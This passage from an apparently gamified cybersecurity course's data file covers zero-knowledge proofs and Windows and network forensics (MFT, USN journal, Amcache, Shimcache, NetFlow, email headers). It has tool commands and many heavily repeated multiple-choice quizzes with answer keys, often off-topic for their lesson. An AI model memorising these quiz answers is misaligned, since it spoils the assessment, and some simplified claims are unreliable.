login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"zero-knowledge-proofs","cat":"Cryptography","title":"Zero Knowledge Proofs Intro","diff":3,"xp":200,"intro":"Prove you know something without revealing what you know.","sections":[{"type":"text","content":"A ZKP lets you prove a statement is true (e.g., 'I know the password') without revealing the password itself. Used in blockchain and auth."},{"type":"code","lang":"python","content":"# The cave analogy:\n# Alice proves she knows the secret password\n# to open a door inside a cave\n# WITHOUT telling Bob the password.\n# She enters from a random side,\n# Bob picks which side she exits.\n# If she always exits correctly,\n# she must know the password.\n# Real ZKPs: zk-SNARKs (Zcash), zk-STARKs"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"In a zero knowledge proof, the verifier learns...","opts":["The secret","Nothing except that the statement is true","The proof method","Half the secret"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"ntfs-mft-analysis","cat":"Forensics & IR","title":"NTFS MFT Analysis","diff":2,"xp":150,"intro":"The Master File Table records every file \u2014 even deleted ones.","sections":[{"type":"text","content":"Every NTFS file has an MFT entry with timestamps, size, permissions, and data. Deleted files keep their MFT entry until overwritten."},{"type":"code","lang":"bash","content":"# Parse MFT with analyzeMFT\nanalyzemft.py -f $MFT -o mft_output.csv\n# Or MFTECmd (Eric Zimmerman)\nMFTECmd.exe -f $MFT --csv output\n# Key fields: Created, Modified, Accessed, Entry Modified\n# $STANDARD_INFORMATION timestamps are easily modified\n# $FILE_NAME timestamps are harder to fake"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why are $FILE_NAME timestamps more forensically reliable?","opts":["They're encrypted","They can't be easily modified by standard tools","They're stored in a different location","They use UTC"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"usn-journal","cat":"Forensics & IR","title":"NTFS USN Journal Analysis","diff":2,"xp":150,"intro":"The Update Sequence Number journal logs every file change.","sections":[{"type":"text","content":"The USN journal ($UsnJrnl:$J) records file creates, deletes, renames, and modifications. Even if the file is gone, the journal entry remains."},{"type":"code","lang":"bash","content":"# Parse USN Journal\nfsutil usn readjournal C:\n# Or with MFTECmd\nMFTECmd.exe -f $UsnJrnl --csv output\n# Useful for: timeline of file activity,\n# detecting timestomping, finding deleted evidence"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"The USN journal records...","opts":["Network connections","Every file system change","Login events","Registry modifications"],"ans":1},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"amcache-analysis","cat":"Forensics & IR","title":"Amcache Forensic Analysis","diff":2,"xp":150,"intro":"Amcache records program execution \u2014 even if the program was deleted.","sections":[{"type":"text","content":"Amcache.hve records executables, drivers, and shortcuts. It includes SHA1 hashes, file paths, and timestamps \u2014 proving a program existed."},{"type":"code","lang":"bash","content":"# Parse Amcache\nAmcacheParser.exe -f Amcache.hve --csv output\n# Key artifacts:\n# - Full file path of executed programs\n# - SHA1 hash (compare with malware databases)\n# - First execution timestamp\n# - Publisher information"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Amcache uniquely provides which forensic artifact?","opts":["Network connections","SHA1 hashes of executed programs","User passwords","Registry changes"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"shimcache-analysis","cat":"Forensics & IR","title":"Shimcache (AppCompatCache)","diff":2,"xp":150,"intro":"Application Compatibility Cache proves files existed on disk.","sections":[{"type":"text","content":"Shimcache records file paths and last modified timestamps for any executable the OS encountered \u2014 even if never executed (just browsed to)."},{"type":"code","lang":"bash","content":"# Parse Shimcache from SYSTEM hive\nAppCompatCacheParser.exe -f SYSTEM --csv output\n# Or with ShimCacheParser.py\npython ShimCacheParser.py -i SYSTEM -o shimcache.csv\n# Key difference from Amcache:\n# Shimcache records file PRESENCE, not necessarily execution"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Shimcache records files that were...","opts":["Executed only","Present on the filesystem (may or may not have run)","Downloaded","Emailed"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"network-forensics-flows","cat":"Forensics & IR","title":"Network Flow Analysis","diff":1,"xp":100,"intro":"Analyze traffic patterns without full packet capture.","sections":[{"type":"text","content":"NetFlow/IPFIX records source, destination, ports, bytes, and duration for every connection \u2014 metadata without content. Great for finding beaconing."},{"type":"code","lang":"bash","content":"# Analyze NetFlow with nfdump\nnfdump -r flows.nfcapd -s srcip/bytes\n# Find top talkers\nnfdump -r flows.nfcapd -s dstip/flows -n 10\n# Find beaconing (regular interval connections)\nnfdump -r flows.nfcapd -A srcip,dstip,dstport | sort -t, -k4 -rn\n# Zeek (Bro) connection logs\ncat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p duration"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"NetFlow records...","opts":["Full packet content","Connection metadata (IPs, ports, bytes)","File transfers","Email content"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"email-header-forensics","cat":"Forensics & IR","title":"Email Header Forensics","diff":1,"xp":75,"intro":"Trace an email's origin by reading its headers bottom-up.","sections":[{"type":"text","content":"Email headers record every server that handled the message. Read Received: headers from bottom (origin) to top (destination) to trace the path."},{"type":"code","lang":"bash","content":"# Key headers to examine:\n# From: (easily spoofed)\n# Return-Path: (actual sender)\n# Received: (bottom = origin, each server adds one)\n# X-Originating-IP: (sender's IP)\n# Message-ID: (unique, sometimes reveals sender's domain)\n# Authentication-Results: (SPF/DKIM/DMARC pass/fail)\n\n# Check SPF\ndig txt sender-domain.com | grep spf"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Email Received: headers should be read...","opts":["Top to bottom","Bottom to top (oldest first)","Left to right","Alphabetically"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts 